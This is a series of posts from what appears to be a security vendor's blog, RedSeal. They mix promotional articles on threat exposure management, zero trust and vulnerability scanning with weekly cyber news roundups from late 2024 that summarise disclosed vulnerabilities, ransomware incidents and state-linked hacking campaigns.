Prioritize to Protect: RedSeal’s Methodology for Effective Threat Exposure Management

In the fast-paced world of cybersecurity, the sheer volume of threat exposures can overwhelm even the most diligent security teams. Effective prioritization is not just a best practice; it’s essential for safeguarding your organization’s assets and ensuring a robust security posture.

The importance of prioritization

Prioritization in Continuous Threat Exposure Management (CTEM) goes beyond vulnerabilities and assessing CVSS scores or severity levels. RedSeal navigates the complexity by providing a comprehensive approach to prioritizing exposures based on the risk to the organization. By considering a multitude of internal, external, business, and technical factors, RedSeal focuses teams on high-impact, exploitable exposures that align with high-priority systems and assets, transforming how organizations manage their cybersecurity efforts.

How RedSeal enhances prioritization

At RedSeal, we understand that effective prioritization requires a nuanced approach. Our platform evaluates a wide array of factors to determine risk and prioritize exposures accurately. While traditional CTEM programs prioritize then validate threat exposures, RedSeal uniquely combines these steps—automatically validating all exposures before prioritizing them. After all, if an exposure isn’t actually exploitable, it shouldn’t be a priority. RedSeal evaluates all possible access—from north, south, east, and west—across the entire network to assess the viability of exploitation and measure the true impact (blast radius) of each exposure. Then, all possible consequences from direct and indirect (downstream) threats are considered. The platform calculates risk scores by combining vulnerability and business data with unmatched network context, ensuring exposures with greater business impact take higher priority.

RedSeal CTEM prioritization in action:

  1. Comprehensive risk assessment: RedSeal calculates risk scores by integrating data from security controls, asset criticality, and vulnerability assessments, along with network context. This approach ensures that no critical threat goes unnoticed.
  2. Network contextualization: Our unique capability to provide unmatched network context is a game-changer. By factoring visibility, exploitability, potential exploitation, and the likely impact of exposures into the prioritization process, RedSeal offers a complete picture of the true threat.
  3. Network digital twin: The concept of a network digital twin is crucial in our prioritization process. It allows us to visualize both direct attack paths and the indirect, downstream consequences of potential threats. This holistic view helps organizations understand the broader implications of vulnerabilities and focus on exposures that could have the greatest impact.
  4. Business impact focus: At the heart of our prioritization strategy is a commitment to business impact. Exposures with the potential for greater repercussions on the organization are given higher priority, aligning cybersecurity efforts with overarching business objectives.

In today’s complex security environment, effective prioritization of threat exposures is vital for successful Continuous Threat Exposure Management. RedSeal provides the tools necessary to assess risks comprehensively and focus on what truly matters. By considering a range of internal, external, business, and technical factors, we empower organizations to navigate their threat landscape with confidence and precision.

A partnership with RedSeal ensures that your CTEM efforts are strategically focused on high-impact exposures that protect your business and its future.

Read our blog on scoping, the first step in CTEM management and discovery, the second step in CTEM management.

Reach out to RedSeal today to schedule a demo and learn about RedSeal’s crucial role in supporting CTEM programs.

 

 

Cyber News Roundup for October 18, 2024

In an increasingly interconnected and technologically advanced world, the scope and complexity of cyber threats and security challenges have never been greater. From drones probing military bases to critical vulnerabilities in widely used software and hackers exploiting outdated physical access controls, organizations and governments face a wide range of risks that demand immediate attention and action. This week’s articles highlight the latest cybersecurity challenges, emphasizing the urgent need for proactive defenses against these emerging threats.

 

Mystery Drones Swarmed a U.S. Military Base for 17 Days. The Pentagon Is Stumped

In December, a fleet of advanced drones, suspected to be of Chinese origin, swarmed U.S. military installations near Norfolk, Virginia, including the home of Navy SEAL Team 6. These drones, capable of speeds over 100 mph and synchronized via AI, flew for 17 days, causing concern within the Biden administration. Due to legal restrictions preventing the military from shooting them down unless an imminent threat was posed, no decisive action was taken, even though the drones hovered over one of the most sensitive U.S. military bases.

A month later, a Chinese student was arrested after flying a drone near the base. The incident, along with similar drone sightings near nuclear facilities and other sensitive military sites, raised alarms about possible espionage or reconnaissance missions to test U.S. defenses. Critics argue that the administration’s inaction demonstrated weakness and missed an opportunity to send a strong message to China. This series of incidents is seen as part of a broader pattern of probing U.S. responses to potential threats. (WSJ, Fox News )

A critical vulnerability in Veeam Backup & Replication software is being exploited

A critical vulnerability in Veeam Backup & Replication software (CVE-2024-40711) is being exploited by hackers to deploy ransomware, including Fog and Akira variants. The flaw allows unauthenticated remote code execution, enabling attackers to create unauthorized accounts and gain privileged access. Attackers initially gained access through compromised VPN gateways without multifactor authentication. Sophos reported several attacks over the past month, highlighting the need for patching, updating outdated VPNs, and implementing strong security measures. Veeam has released a patch (version 12.2.0.334), and administrators are urged to apply it immediately. (Cyber Security News)

 

Iranian hackers exploit Windows flaw to elevate privileges

An Iranian state-sponsored hacking group named APT34 and also known as OilRig, is targeting government and critical infrastructure entities in the United Arab Emirates and the Gulf Region with an enhanced campaign. As reported by researchers at Trend Micro, the group is deploying a backdoor that uses Microsoft Exchange servers to steal credentials and which exploits a known Windows flaw to elevate their privileges on compromised devices. This flaw is a high-severity privilege escalation vulnerability with a CVE number that Microsoft fixed in June. According to BleepingComputer, “Microsoft has acknowledged a proof-of-concept exploit for this CVE numbered flaw, but has not yet marked it as actively exploited, nor has CISA reported it in its Known Exploited Vulnerability catalog.” (BleepingComputer)

 

Microsoft deprecates PPTP and L2TP VPN protocols in Windows Server

These two tunneling protocols are being officially deprecated by Microsoft for future versions of Windows Server, along with a recommendation that admins move to different protocols that offer increased security. The Point-to-Point Tunneling Protocol (PPTP) and Layer 2 Tunneling Protocol (L2TP) have been in use for more than 20 years to allow remote access to corporate networks and Windows servers. However, PPTP has “become vulnerable to offline brute force attacks of captured authentication hashes, and L2TP provides no encryption unless coupled with another protocol, like IPsec, and even then, weaknesses can appear. Microsoft now recommends users move to the newer Secure Socket Tunneling Protocol (SSTP) and Internet Key Exchange version 2 (IKEv2) protocols, which provide better performance and security. (BleepingComputer)

 

Organizations Slow to Protect Doors Against Hackers

A recent study reveals that many organizations have been slow to secure vulnerable door access controllers, leaving them open to remote attacks. Researcher Shawn Merdinger, through his project “Box of Rain,” identified exposed systems in sectors such as healthcare, education, and law enforcement. Despite warnings and reports, many controllers remain vulnerable due to default credentials or unprotected web interfaces, potentially allowing hackers to gain unauthorized access. The findings highlight the ongoing risks posed by outdated physical access controls. (SecurityWeek)

Multiple Splunk Enterprise Vulnerabilities Let Attackers Execute Remote Code

Splunk has patched multiple high-severity vulnerabilities in its Enterprise and Cloud Platform products that allow remote code execution. These flaws, including CVE-2024-45733 (CVSS 8.8), affect Windows versions below 9.2.3 and 9.1.6. Another issue, CVE-2024-45731, allows file writing to the system root, while CVE-2024-45732 could enable unauthorized access to data. Splunk recommends upgrading to the latest versions and applying mitigations, such as disabling Splunk Web and ensuring proper installation configurations. These vulnerabilities highlight the critical need for timely security updates to protect sensitive systems. (Cyber Security News)

 

Must patch flaw exposes tens of thousands

We are now getting a clearer idea of just how many IPs are vulnerable to the Fortinet vulnerability that CISA placed on its critical patch list last week. According to CyberScoop, around 87,000 IPs are likely susceptible to the vulnerability, which has a 9.8 rating on the CVSS scale. Fortinet released a fix in February, but the issue remains widespread, with the majority of vulnerable IPs located in Asia, North America, and Europe. Federal agencies are required to address the issue by the end of October. (CyberScoop)

 

Firefox zero-day update to include Tor

Shortly after Firefox rolled out version 131.0.2 with a fix for a critical zero-day vulnerability (CVE-2024-9680), the Tor browser was also updated to patch the issue. The bug, which could lead to remote code execution via a use-after-free flaw in the Animation timeline, had been actively exploited in the wild, as confirmed by Mozilla and reported by ESET. Both Firefox and Tor quickly responded to the exploit, delivering fixes within 25 hours of identifying the issue. (Security Week)

 

Nearly 400 U.S. healthcare institutions hit with ransomware over past 12 months

On Tuesday, Microsoft released a report revealing that between July 2023 and June 2024, 389 U.S.-based healthcare institutions were successfully hit with ransomware. The attacks caused network and system outages, delays in critical medical operations and rescheduled appointments. Microsoft customers reported a 2.75x increase in human-operated ransomware encounters. The researchers said that the motives of Russian, North Korean and Iranian cybercriminals appear to have shifted from destruction to financial gain. The report did yield some positive news, showing that the percentage of ransomware attacks that reached the encryption stage has decreased significantly over the past two years. (The Record and The Register)

 

Encryption flaws found in WeChat

Researchers at Citizen Lab investigated the MMTLS encryption protocol used by the massively popular WeChat app. They found that MMTLS was a modified version of TLS 1.3 that introduced cryptographic weaknesses. While the researchers could not craft an attack to exploit these weaknesses, they noted that MMTLS uses deterministic initialization vectors, which opens the door to a brute force attack and goes against NIST recommendations. The protocol also lacks forward secrecy due to its heavy use of session-resuming pre-shared keys. The researchers published full findings and methodologies on GitHub. (Citizen Lab)

 

CISA refines SBOM guidance

The US Cybersecurity and Infrastructure Security Agency published a new edition of its Framing Software Component Transparency document, providing new guidance on creating software bill of materials (SBOMs). This now sets out SBOM attributes into minimum expected, recommended, and aspirational categories. The baseline requirements primarily focus on transparency and interoperability with existing SBOM formats. CISA also pointed out that to make SBOMs useful, the industry needs coordinated and automated methods to share SBOM data. (Infosecurity Magazine)

 

Hackers steal data from Verizon’s push-to-talk (PTT) system

Hackers have stolen data from Verizon’s push-to-talk (PTT) system, which is marketed to government agencies and first responders, and are now selling the data on a Russian cybercrime forum. 404 Media reports the breach did not affect Verizon’s main consumer network, but it targeted a third-party provider supporting the PTT system. The stolen data includes call logs, emails, and phone numbers. Verizon confirmed that a small subset of customer data was exposed but noted that no sensitive information such as Social Security numbers was leaked. The hackers, including Cyberphantom and Judische, are part of a cybercriminal group known as the “Com,” responsible for numerous high-profile breaches. The hackers are selling the stolen data instead of extorting Verizon. (CyberInsider)

 

CISA and its partners warn of Iranian brute force password attempts

A joint cybersecurity advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), FBI, NSA, and other international authorities warns that Iranian cyber actors are increasingly using brute force methods like password spraying and “push bombing” to target global critical infrastructure sectors. These attackers focus on healthcare, government, IT, and energy sectors to steal credentials and gain deeper access to systems. The advisory highlights that Iranian actors have exploited MFA vulnerabilities and sold stolen credentials, urging organizations to enhance security by implementing phishing-resistant MFA and monitoring for suspicious logins and behaviors. (Gov Info Security)

 

F5 publishes quarterly security notification, addressing BIG-IP and BIG-IQ vulnerabilities

News about the fixes for these vulnerabilities came in the company’s October edition of its quarterly security notification. The update for BIG-IP, a collection of hardware platforms and software solutions address a high-severity security defect affecting the appliance’s monitor functionality. The update for BIG-IQ, which centralizes management, licensing, monitoring, and analytics for a dispersed BIG-IP infrastructure, is described as “a stored cross-site scripting (XSS) bug in an undisclosed page of the appliance’s user interface.” F5 makes no mention of either of these vulnerabilities being exploited in the wild. Further details are available in the F5 quarterly security notification, a link to which is available in the show notes to this episode. (F5 Quarterly Security Notification)

 

Vulnerability warning from Kubernetes and VMWare, plus new KEV catalog entries

Finally, just a quick summary of some vulnerabilities of note this week, a Kubernetes Image Builder vulnerability could allow attackers to gain root access if exploited under specific conditions. This applies only to Kubernetes clusters with nodes using VM images from the Image Builder project and its Proxmox provider. VMware has fixed “a high-severity SQL injection flaw in HCX allowing non-admin users to remotely execute code on the HCX manager,” and CISA has added three vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: a Microsoft Windows Kernel TOCTOU race condition vulnerability, a Mozilla Firefox use-after-free vulnerability, and a SolarWinds Web Help Desk hardcoded credential vulnerability. Links to details on these is available in the show notes. (Security Affairs, Security Affairs and Security Affairs)

 

Have questions? Reach out to RedSeal today to chat with one of our cybersecurity experts or schedule a demo today.

Navigating Cybersecurity Risks: RedSeal’s Discovery Solutions for CTEM

In today’s cybersecurity landscape, simply knowing your assets isn’t enough; you must be able to uncover hidden vulnerabilities that put your organization at risk. As cyber threats become increasingly sophisticated, the discovery phase of Continuous Threat Exposure Management (CTEM) takes center stage. This critical process involves not just identifying what assets you have, but also continuously monitoring their connections and assessing them for both known vulnerabilities and emerging threats. It’s the distinction between simply getting by and actively safeguarding your digital environment. 

 The importance of discovery in CTEM 

Gartner recommends running discovery against scopes outlined in the previous stage to increase awareness of risks among relevant business teams and to make exposure management successes more impactful in later stages. By running discovery against clearly defined scopes, businesses can significantly enhance awareness of risks among relevant teams. This awareness not only aids in identifying potential threats but also ensures that any successes in exposure management are meaningful and impactful in later stages. 

 How RedSeal supports discovery 

At RedSeal, we recognize that automation is vital for keeping track of asset exposures. Our platform goes beyond traditional external exposure hunting tools that only provide a snapshot of vulnerabilities. Instead, RedSeal builds a reliable, comprehensive digital twin of your entire environment, automating the analysis of complex layers of network infrastructure. This approach allows organizations to continuously identify exposures caused by various factors, including: 

  • Unmanaged assets: Detecting assets that may not be adequately monitored or secured. 
  • Misconfigurations: Identifying incorrect settings that could leave systems vulnerable. 
  • Unintended connections: Uncovering both direct and indirect links that could pose risks. 
  • Firewall rules and policy violations: Ensuring that security policies are properly enforced. 
  • Vulnerabilities: Continuously scanning for known vulnerabilities and emerging threats. 

RedSeal continuously identifies all assets and exposures, including those due to hidden assets, misconfigurations, unintended connections (direct and indirect), firewall rules, and policy violations, as well as known and unknown vulnerabilities. It also runs automated attack path analysis and compliance checks against external regulations/standards, internal policies, and best practices to keep exposure assessments current.  This ensures that exposure assessments remain current, enabling organizations to stay ahead of potential threats. 

Effective discovery is a cornerstone of an effective CTEM program. By leveraging RedSeal’s robust capabilities, organizations can confidently navigate the complexities of their networks, ensuring that they are prepared to mitigate risks and protect their valuable assets. With a reliable digital twin and automated assessments, RedSeal is pivotal in enhancing an organization’s security posture, making exposure management a proactive and ongoing endeavor. 

 Read our blog on scoping, the first step in CTEM management. 

 Reach out to RedSeal today to schedule a demo and learn about RedSeal’s crucial role in supporting CTEM programs. 

Make Network Security a Zero Trust Priority

The National Security Agency’s (NSA) Cybersecurity Information Sheet (CSI) titled “Advancing Zero Trust Maturity Throughout the Network and Environment Pillar” and the CISA Zero Trust Maturity Model version 2 underscore the importance of securing network environments in line with zero trust principles. Both documents emphasize an integrated approach to zero trust, placing network security alongside identity management, data protection, and continuous monitoring.

John Kindervag, the creator of zero trust, recently cautioned the cybersecurity industry about its overemphasis on identity management, reminding us of the critical role that network security plays in the zero trust framework. As organizations continue to mature their zero trust architectures, the NSA and CISA outline clear guidelines on how network security fits into the overall security strategy.

Key insights from the CISA and NSA zero trust guidance

1. Data flow mapping

The CISA Zero Trust Maturity Model v2 emphasizes the importance of understanding data flows across the network to enforce zero trust effectively. RedSeal’s network mapping capabilities align perfectly with this requirement. By visualizing network paths, RedSeal helps organizations identify unprotected data flows, ensuring that sensitive information does not traverse insecure network paths. This visibility is crucial for implementing micro- and macro-segmentation strategies.

2. Macro-segmentation and micro-segmentation

Both the NSA and CISA documents stress the need for segmentation as a core component of zero trust. Macro-segmentation involves dividing networks into broad security zones to limit lateral movement by attackers. RedSeal’s “Zones and Policies” feature supports this by enforcing policies that prevent unauthorized access between different zones, such as between departments or IT and operational technology environments.

Micro-segmentation, on the other hand, focuses on further reducing the attack surface within network segments. RedSeal’s policy management capabilities assist organizations in enforcing precise controls at a granular level. With RedSeal’s advanced network modeling, you can identify the most critical areas for micro-segmentation and ensure policies are applied effectively.

3. Software-defined networking (SDN)

RedSeal’s capabilities complement SDN implementations, which are highlighted by CISA and NSA as essential for creating dynamic, adaptable zero trust environments. SDN allows for more granular and flexible control over network traffic. RedSeal enhances these SDN strategies by providing deep insights into network structure and identifying potential vulnerabilities, which is crucial for crafting effective SDN policies.

4. Threat visibility and continuous monitoring

Continuous monitoring is a cornerstone of zero trust, as outlined by both the NSA and CISA. RedSeal’s continuous network visibility and monitoring allow organizations to stay vigilant and identify potential risks. The ability to verify network configurations continuously ensures that security policies remain effective and adaptive as threats evolve.

Advancing zero trust maturity with RedSeal

RedSeal is uniquely positioned to help organizations mature their zero trust architectures, particularly within the network and environment pillar. By delivering comprehensive network visibility, enabling effective segmentation, and supporting SDN strategies, RedSeal plays a critical role in limiting attack surfaces and strengthening an organization’s security posture.

Zero trust is not a one-size-fits-all approach, but by leveraging RedSeal’s capabilities, you can ensure your network security is robust, dynamic, and capable of meeting the stringent requirements outlined by both CISA and NSA.

Discover how RedSeal can enhance your zero trust journey by scheduling a demo or attending one of our free monthly Cyber Threat Hunt workshops.

 

Cyber News Roundup for October 4, 2024

Recent headlines highlight significant challenges in cybersecurity across the globe. Cloudflare blocked a massive 3.8 Tbps DDoS attack targeting finance and telecom sectors, while Adobe Commerce faces exploitation of critical vulnerabilities. Agence France-Presse experienced disruptions from cyberattacks, and UMC Health in Texas diverted patients due to a ransomware incident. Major providers like Verizon and PlayStation also faced outages. With state Chief Information Security Officers expressing budget concerns, the urgency for robust cybersecurity measures has never been clearer, emphasizing the need for ongoing vigilance in the face of evolving threats.

 

Cloudflare blocks largest recorded DDoS attack peaking at 3.8Tbps

This denial-of-service campaign targeted organizations in the financial services, internet, and telecommunications sectors, part of a “month-long barrage of more than 100 hyper-volumetric DDoS attacks flooding the network infrastructure with garbage data.” According to Cloudflare, who successfully blocked the attack, the infected devices used were mostly located in Russia, Vietnam, the U.S., Brazil, and Spain. They consisted of a large number of Asus home routers, Mikrotik systems, DVRs, and web servers. The peak at 3.8 Tbps lasted 65 seconds. (BleepingComputer)

 

Adobe Commerce and Magento stores compromised by CosmicSting bug

Researchers at Sansec have reported that numerous threat actors have exploited this vulnerability in Adobe Commerce, which comes with a CVSS score of 9.8, and has compromised more than 4,000 e-stores over the past three months. “An attacker could exploit this issue by sending a crafted XML document that references external entities, and exploitation of this issue does not require user interaction.” This vulnerability had been added to the CISA KEV catalog in July of this year. (Security Affairs)

 

A global news agency suffers a cyberattack

Agence France-Presse (AFP) experienced a cyberattack on September 27, disrupting its content distribution infrastructure, but its core news reporting remains unaffected. The attack targeted AFP’s IT systems, specifically content delivery networks and file transfer services used to deliver news to clients. While the type of attack and the responsible party are still unknown, AFP quickly responded, with the French cybersecurity agency ANSSI assisting in securing the systems. AFP warned clients that their FTP credentials might have been compromised, advising them to update passwords and secure their systems. Despite these technical issues, AFP assured that its newsroom continues to operate without interruptions, delivering news globally in multiple languages. No group has claimed responsibility for the attack so far. (Hackread)

 

A Texas health system diverts patients following a ransomware attack

UMC Health System in Texas has been diverting patients after a ransomware attack forced them to take their IT systems offline. The incident, disclosed on September 27, led to both emergency and non-emergency patients being diverted to nearby hospitals. UMC launched an investigation and disconnected its systems to contain the breach. By Monday, some services were restored, and only a few patients were still being diverted. UMC’s Emergency Center is now accepting ambulance patients, while other facilities remain open but are not fully operational. The hospital has engaged third-party experts to aid in the recovery process. Downtime procedures have been implemented, and patients are being informed of changes to appointments. UMC continues its efforts to restore services safely and provide updates on the investigation and remediation efforts. (SecurityWeek)

 

Western Digital patches a critical vulnerability in network attached storage devices

A critical vulnerability, CVE-2024-22170, has been identified in Western Digital’s My Cloud devices, affecting models like My Cloud EX2 Ultra and PR4100. This flaw, with a CVSS score of 9.2, allows attackers to exploit an unchecked buffer in the Dynamic DNS client through a Man-in-the-Middle attack, leading to arbitrary code execution. Western Digital has addressed the issue in a firmware update and urges users to update immediately. The vulnerability poses risks of unauthorized access, data corruption, and system crashes. Western Digital thanks researchers at Claroty for responsibly disclosing the issue.  (CyberSecurity News)

 

Verizon and PlayStation each suffer outages

On Monday morning, thousands of Verizon users across major U.S. cities, including New York, Los Angeles, and Chicago, experienced widespread cellphone service outages. Over 104,000 reports were logged on Downdetector by 11:30 a.m. Eastern, with the number later dropping to 78,000. Many users reported their phones showing “SOS” mode, preventing calls and messages. Verizon confirmed the issue, with engineers working to resolve it, though the cause was unclear. Simultaneously, the PlayStation Network (PSN) faced a global outage, affecting services like gaming, account management, and the PlayStation Store. Sony is working to fix the issue, which began at 8:41 PM ET, with some services still down, potentially due to overloaded servers. Both outages disrupted users’ daily activities and work. (Bleeping Computer) (The New York Times)

 

A Crypto Criminal Stretches His Limits—And His Legs 

And finally, Krebs on Security chronicles an absolutely bonkers mix of cybercrime and corruption straight out of a pulp novel.  A California man, Adam Iza (aka “The Godfather”), is accused of not only dodging taxes on millions allegedly earned from cybercrime but also paying off local cops to help intimidate rivals. Iza, co-owner of the cryptocurrency platform Zort, reportedly spent investors’ money on luxury cars, jewelry, and even leg-lengthening surgery. I swear I am not making this up.

According to the FBI, Iza hired Los Angeles Sheriff’s Department officers to help him extort former business partners, some of whom were tied to the notorious hacker group UGNazi. One incident involved trying to steal a laptop full of cryptocurrency, while another involved kidnapping attempts. Iza allegedly paid these officers $280k a month for their “services,” like forcing rivals to hand over assets.

Iza’s scheme came to light after he stiffed a private investigator, triggering a cascade of lawsuits and criminal investigations. His girlfriend, also allegedly involved, is now dating the star of reality TV show Love Island. This tale has everything—crypto, hackers, corrupt cops, and reality show romance!  With corrupt deputies, stolen millions, and custom legs, this saga truly stretches the limits of what we thought possible in cybercrime. (Krebs on Security)

 

Critical NVIDIA flaw affects AI applications 

Researchers at Wiz have disclosed a critical vulnerability (CVE-2024-0132) affecting NVIDIA Container Toolkit and GPU Operator. The flaw affects any AI application that uses the toolkit to enable GPU support. NVIDIA issued a patch on September 26th.

Wiz stated, “The vulnerability enables attackers who control a container image executed by the vulnerable toolkit to escape from that container and gain full access to the underlying host system, posing a serious risk to sensitive data and infrastructure.” The researchers add, “The urgency with which you should fix the vulnerability depends on the architecture of your environment and the level of trust you place in running images. Any environment that allows the use of third party container images or AI models – either internally or as-a-service – is at higher risk given that this vulnerability can be exploited via a malicious image.” (Wiz, Nvidia)

 

North Korean hackers breach German missile manufacturer

North Korean hackers linked to the Kimsuky APT group successfully targeted Diehl Defence, a German missile manufacturer, by using spear-phishing emails with fake job offers. The attack involved booby-trapped PDF files and advanced social engineering tactics designed to steal login credentials. The breach marks major concerns due to the sensitive nature of the manufacturer’s work on air defense systems, including a recent contract with South Korea. (Security Week)

 

State CISO’s struggle with budget constraints 

As per the story above, it seems a local community is being hit by a cyberattack every week, and new research shows why that might be. According to a new report from Deloitte and the National Association of Chief Information Officers (NASCIO), nearly 40% of U.S. state CISOs believe their cybersecurity budgets fall short of what they need to keep their citizens safe. In fact, more than a third stated they do not have a dedicated cybersecurity budget. The majority of CISOs surveyed said third-party breaches were the biggest threat they currently face, followed by AI-enabled attacks and foreign state-sponsored espionage. (InfoSecurity Magazine)

 

Have questions? Reach out to RedSeal today to chat with one of our cybersecurity experts or schedule a demo today.

Critical to CTEM Success: Driving Effective Scoping

In today’s rapidly escalating threat landscape, delaying action on cyber risk is no longer an option. Cyber threats are growing in both complexity and frequency, making it crucial for organizations to understand and prioritize their mission-critical assets now. Effective scoping in of Continuous Threat Exposure Management (CTEM) is the key to identifying, assessing, and managing risks, ensuring that your organization stays ahead of emerging threats.  

Understanding the scoping process 

Scoping is not about limiting the reach of your CTEM program; instead, it provides a structured approach to organizing and communicating exposure management efforts and outcomes to leadership and stakeholders. By clarifying key questions during this stage, scoping puts exposure management in a meaningful business context.  

 Key questions during this stage include: 

  • What do we own?
  • What does it do for our business? 
  • What are the risks if it is compromised? 

By answering these questions, organizations can create a clearer picture of their attack surface and better prepare for potential threats. 

 RedSeal’s role in smart scoping 

RedSeal plays a pivotal role in supporting effective scoping within CTEM programs. By providing a reliable asset inventory, RedSeal consolidates resources from various environments—including public cloud, private cloud, on-premises, IT, operational technology (OT), and Internet of Things (IoT)—into a single, comprehensive model known as a network digital twin. 

 This powerful visualization tool allows organizations to map their resources into physical, logical, and custom topology groups. As a result, stakeholders can easily identify business-critical systems and assets, enabling them to define scopes that are relevant to their specific business context. The unparalleled ability of RedSeal to uncover and map hybrid infrastructure ensures that no potential vulnerability goes unnoticed. 

 Aligning security and business priorities 

Incorporating effective scoping practices into your CTEM program is essential for bridging the gap between cybersecurity and business strategy. With RedSeal’s capabilities, organizations can align their security priorities with business priorities, ensuring that exposure management efforts are both relevant and impactful. 

 As you navigate the complexities of today’s threat landscape, remember that thoughtful scoping, powered by RedSeal, is key to maintaining a strong security posture. By focusing on what matters most to your business, you can enhance your organization’s resilience and protect against the ever-evolving array of cyber threats. 

Reach out to RedSeal today to schedule a demo and learn about RedSeal’s pivotal role in supporting CTEM programs.

Cyber News Roundup for September 27, 2024

In today’s digital world, cyber threats are growing fast, and both skilled state-backed hackers and less sophisticated attackers are going after critical systems around the globe. From Russia’s Gamaredon group stepping up its cyber spying against Ukraine, to new vulnerabilities that allow hackers to remotely control everyday systems like Kia vehicles, the risks are more diverse and widespread than ever.

Recent events underline the need for taking proactive steps, whether it’s securing critical infrastructure like Kansas’ water systems or tackling malware that can get around two-factor authentication (2FA). With cyber campaigns like Salt Typhoon targeting U.S. broadband providers, and the CrowdStrike outage catching attention, organizations need to stay on their toes and keep up with the changing threat landscape.

As the risks grow, it’s a good time for businesses and governments to rethink their defenses and stay ahead of these evolving threats.

 

Russia’s Gamaredon remains highly active against Ukraine

ESET has published a report on the toolset used by the Russian threat actor Gamaredon to target Ukraine over the past two years. The researchers note that Gamaredon “is currently the most engaged APT group in Ukraine,” primarily conducting cyberespionage against Ukrainian government entities. The Security Service of Ukraine has attributed the threat actor to the FSB’s 18th Center of Information Security, based in Crimea.

ESET states, “In general, we can categorize Gamaredon’s toolset into downloaders, droppers, weaponizers, stealers, backdoors, and ad hoc tools. The group uses a combination of general-purpose and dedicated downloaders to deliver payloads. Droppers are used to deliver various VBScript payloads; weaponizers alter properties of existing files or create new files on connected USB drives, and stealers exfiltrate specific files from the file system. Additionally, backdoors serve as remote shells, and ad hoc tools perform specific functions, like a reverse SOCKS proxy or payload delivery using the legitimate command line program rclone.” (ESET)

Web vulnerability exposed Kia vehicles to hacks

A group of researchers today disclosed a vulnerability in a Kia web portal that could give an attacker remote control over vehicle functions using only a license plate number, WIRED reports. The attacker could exploit the flaw to reassign themselves as an owner of a vehicle, allowing them to unlock the car, start its ignition, or passively track its location. The researchers note, “These attacks could be executed remotely on any hardware-equipped vehicle in about 30 seconds, regardless of whether it had an active Kia Connect subscription.” WIRED says Kia appears to have patched the flaw. (Sam Curry, Wired)

 

NIST drops password complexity, mandatory reset rules

In the second public draft version of its password guidelines, the National Institute of Standards and Technology is making two changes. The first is that credential service providers stop requiring that users set passwords that use specific types or characters, and the second is to stop mandating periodic password changes (commonly every 60 or 90 days). This first suggestion actually paves the way for longer passwords of between 15 and 64 characters and that they include ASCII and Unicode characters. The second supports the idea that password resets should only occur in the case of a credential breach. Making people change passwords frequently was resulting in people choosing weaker passwords. (Dark Reading)

 

CISA speaks out regarding Kansas water incident

Following up on a story we covered on Wednesday regarding the cybersecurity issue at the water treatment facility in Arkansas City, Kansas, CISA released a new advisory yesterday, Thursday, as a reminder that “exposed and vulnerable OT/ICS systems may allow cyber threat actors to use default credentials, conduct brute force attacks, or use other unsophisticated methods to access these devices and cause harm.” The agency urged operators to apply its previously released recommendations to defend their systems. (The Record)

 

Hackers claim a Chrome 2FA feature bypass takes less than ten minutes

Google introduced application-bound encryption in Chrome 127 for Windows to prevent cookie-stealing hackers from bypassing two-factor authentication (2FA) using infostealer malware. This security feature ties encrypted data to app identity, making it harder for hackers to access sensitive information. However, multiple infostealer malware developers, including those behind Lumma, Vidar, and Rhadamanthys, claim to have quickly bypassed this new protection. Reports from Bleeping Computer confirm that these malware updates can break Chrome’s cookie encryption, effectively rendering 2FA protections useless. Once attackers steal session cookies, they can bypass authentication and gain full access to users’ accounts and sensitive data. (Forbes)

 

CrowdStrike VP testifies before Congress

Adam Meyers, vice president for counter-adversary operations at CrowdStrike, appeared before a US congressional committee yesterday to address questions about the global outage caused by a faulty CrowdStrike update in July, Infosecurity Magazine reports. The outage was due to a mismatch between input parameters and the rules engine in CrowdStrike’s Falcon sensors, triggering “blue screen of death” errors on all Windows machines that installed the update. Meyers stated, “On July 19, 2024, new threat detection configurations were validated through regular validation procedures and sent to sensors running on Microsoft Windows devices. However, the configurations were not understood by the Falcon sensor’s rules engine, leading affected sensors to malfunction until the problematic configurations were replaced.” Meyers apologized for the disruption and outlined measures taken to prevent future incidents, including enhanced validation and testing processes, phased rollouts of updates, and added runtime safeguards. (Infosecurity Magazine)

 

Salt Typhoon strikes US ISPs

The Wall Street Journal’s sources say US investigators discovered a cyberattack campaign from a Chinese-linked threat actor dubbed Salt Typhoon. This campaign sought to establish footholds in several US-based cable and broadband providers. It’s unclear if the goal was simply reconnaissance or a potential staging for further cyberattacks. It’s been a busy year for China-linked threat groups operating under a “Typhoon” epithet. In January, the US disrupted operations by Volt Typhoon against critical infrastructure, and just last week, a Flax Typhoon botnet was disrupted. US officials frequently warn that due to the depth and frequency of China-linked cyberattacks, these campaigns likely represent the “tip of the iceberg.” (WSJ)

 

“Unsophisticated methods” used against industrial systems

Not all cyberattacks need the advanced capabilities of nation-states behind them. CISA warned that threat actors continue to target critical infrastructure OT and ICS devices with “unsophisticated” methods. This includes using default credentials or brute force attacks. The agency said it “continues to respond to active exploitation of internet-accessible” devices, particularly citing the Water and Wastewater Systems Sector being hit by pro-Russian hacktivists since 2022. CISA issued an advisory back in May on securing against these basic attacks, recommending changing default passwords, enabling MFA, applying security updates, and putting human-machine interfaces behind firewalls. (Bleeping Computer)

 

Have questions? Reach out to RedSeal today to chat with one of our cybersecurity experts.

Building a Robust Vulnerability Management Program: Bridging the Gaps with RedSeal

Effective vulnerability management is essential for safeguarding your network against evolving cyber threats. Recall the Equifax data breach of 2017, which exposed the personal information of over 140 million people, including Social Security numbers and birth dates. This breach resulted from Equifax’s failure to patch a known vulnerability, despite the patch being available for several months. This oversight allowed attackers to exploit the vulnerability and access sensitive data. The incident highlights the critical need for a robust vulnerability management program to ensure timely identification and remediation of security flaws, preventing similar breaches.

While vulnerability scanners and managers are vital tools, they aren’t foolproof. Without a complete and accurate view of your network, these tools can miss or misjudge critical vulnerabilities, leaving your organization exposed. This is where RedSeal makes a difference. By providing comprehensive network visibility, RedSeal enhances the capabilities of traditional scanners, helping you build a more robust and resilient vulnerability management program.

What can you do with RedSeal?

  1. Report missed network assets and subnets: Vulnerability scanners often overlook network assets and subnets. RedSeal’s comprehensive network visibility identifies these gaps, ensuring that all assets are accounted for and properly scanned.
  2. Visualize reachable assets: Optimizing scanner placement is crucial for effective vulnerability management. RedSeal provides a clear visualization of all reachable assets, allowing you to strategically position your scanners where they are most needed.
  3. Pinpoint access issues: Network devices and rules can sometimes block scanners from accessing certain areas. RedSeal helps identify these obstacles, ensuring that your scanners can reach every critical component of your network.
